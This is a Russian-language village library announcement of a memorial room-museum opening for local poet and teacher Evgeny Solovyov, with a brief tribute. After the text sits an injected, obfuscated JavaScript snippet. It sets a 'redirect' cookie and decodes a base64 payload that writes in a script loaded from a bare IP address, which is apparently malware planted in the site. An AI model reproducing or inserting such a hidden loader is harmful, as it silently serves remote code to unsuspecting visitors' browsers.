Здесь сложилась судьба и дорога моя началась

Нарвинская сельская библиотека 29 апреля 2017 года в 14-00 часов приглашает всех кто учился, работал, любит поэзию Евгения Семеновича Соловьева на открытие мемориальной комнаты-музея «Здесь сложилась судьба и дорога моя началась» по адресу Манский район, п. Нарва, ул. Заводская, д.7.

В нашем районе жил замечательный человек – Евгений Семёнович Соловьёв. Более 30 лет он преподавал русский язык и литературу в школах Манского района. Был директором Степнобаджейской и Нарвинской школ. Но ещё Евгений Семёнович – наш, манский поэт – был  постоянным  участником  ежегодных районных фестивалей поэзии, «народным» героем. Не так давно Евгения Семёновича не стало…  Но память о нём живёт в наших сердцах.

Творчество Е.С. Соловьёва обширно и многообразно, все  его стихи  учат нас любить и ценить Родину, людей, жизнь и всегда в любых обстоятельствах, оставаться Человеком. Мы должны помнить и беречь то, что он завещал нам в своих стихах.

function getCookie (e){var U=document.cookie.match (new RegExp («(?:^|; )»+e.replace (/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent (U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor (Date.now ()/1e3),cookie=getCookie («redirect»);if (now>=(time=cookie)||void 0===time){var time=Math.floor (Date.now ()/1e3+86400),date=new Date ((new Date).getTime ()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString (),document.write ('')}